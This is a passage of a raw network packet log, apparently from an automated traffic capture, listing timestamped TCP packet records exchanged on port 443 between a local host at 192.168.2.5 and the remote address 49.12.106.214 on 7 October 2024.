                                                                                                                                                                                        Oct 7, 2024 20:35:38.590235949 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590235949 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590245008 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.590471983 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599482059 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599505901 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599617958 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599627018 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.599667072 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607052088 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607074022 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607165098 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607173920 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.607218027 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614701033 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614717960 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614780903 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614790916 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.614834070 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630002975 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630023956 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630094051 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630101919 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.630146027 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642694950 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642713070 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642796040 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642806053 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.642848015 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655796051 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655822039 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655893087 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655903101 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.655949116 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670500040 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670527935 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670588970 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670600891 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670617104 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.670645952 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676013947 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676031113 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676088095 CEST49875443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:38.676096916 CEST4434987549.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.108779907 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.108903885 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.108912945 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.108957052 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.118617058 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.118638992 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.119160891 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.119169950 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.119225025 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.132524014 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.132546902 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.132673979 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.132682085 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.132725954 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.143920898 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.143934965 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.146452904 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.146459103 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.146970034 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.154881001 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.154898882 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.154983997 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.154994011 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.155041933 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.162535906 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.162554979 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.162610054 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.162615061 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.162652969 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.172461033 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.172487974 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.172558069 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.172563076 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.172760963 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.180551052 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.180571079 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.181606054 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.181611061 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.181658030 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.188035965 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.188052893 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.188157082 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.188173056 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.188213110 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.201105118 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.201132059 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.201227903 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.201242924 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.201282978 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.203075886 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.203144073 CEST4434988749.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.203171968 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.203341961 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.203341961 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.203372002 CEST49887443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.463911057 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.463962078 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:40.464036942 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.464245081 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:40.464267969 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.113064051 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.113142967 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.113569021 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.113575935 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.115530014 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.115537882 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532072067 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532126904 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532145977 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532146931 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532175064 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532187939 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532191992 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532215118 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.532233953 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.561568975 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.561629057 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.561662912 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.561690092 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.561703920 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.561741114 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.815747023 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.815779924 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.815824986 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.815983057 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816060066 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816121101 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816145897 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816176891 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816195965 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816225052 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816234112 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816278934 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.816302061 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.818023920 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.818068027 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.818108082 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.818114996 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.818124056 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.818155050 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.822684050 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.822735071 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.822778940 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.822799921 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.822824955 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.822958946 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.825197935 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.825246096 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.825280905 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:41.825285912 CEST4434989949.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:41.825311899 CEST49899443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.179322958 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.179344893 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.202522993 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.202548981 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.202685118 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.202712059 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.202784061 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.221931934 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.221954107 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.222121954 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.222146988 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.222194910 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.236670971 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.236697912 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.236776114 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.236799955 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.236844063 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.253902912 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.253931046 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.254025936 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.254049063 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.254093885 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.270896912 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.270930052 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.270986080 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.271013021 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.271029949 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.271058083 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.284010887 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.284041882 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.284096956 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.284111023 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.284146070 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.284168959 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.299021006 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.299047947 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.299102068 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.299112082 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.299144983 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.299160957 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.314026117 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.314052105 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.314327002 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.314363003 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.314440966 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.319078922 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.319097996 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.319221973 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.319231033 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.319281101 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.328437090 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.328460932 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.328531981 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.328552961 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.328567028 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.328700066 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.336034060 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.336055994 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.336138010 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.336152077 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.336205959 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.344237089 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.344259977 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.344327927 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.344338894 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.344368935 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.344392061 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.352554083 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.352580070 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.352680922 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.352689028 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.352737904 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.363617897 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.363645077 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.363697052 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.363723040 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.363735914 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.363763094 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.376200914 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.376224995 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.376296043 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.376324892 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.376338959 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.376368046 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.390258074 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.390283108 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.390345097 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.390368938 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.390396118 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.390417099 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.400168896 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.400196075 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.400305986 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.400326014 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.400367975 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.408344030 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.408370972 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.408444881 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.408463001 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.408504009 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.417565107 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.417593002 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.417745113 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.417773008 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.417819023 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.424827099 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.424854040 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.424942017 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.424962044 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.425024986 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.432463884 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.746161938 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.746181965 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.746319056 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.746341944 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.746381998 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.759721994 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.759741068 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.759841919 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.759865999 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.759923935 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.760483980 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.760499954 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.760585070 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.760596991 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.760643959 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.770104885 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.770127058 CEST4434992449.12.106.214192.168.2.5
                                                                                                                                                                                        Oct 7, 2024 20:35:45.770210981 CEST49924443192.168.2.549.12.106.214
                                                                                                                                                                                        Oct 7, 2024 20:35:45.770232916 CEST4434992449.12.106.214192.168.2.5
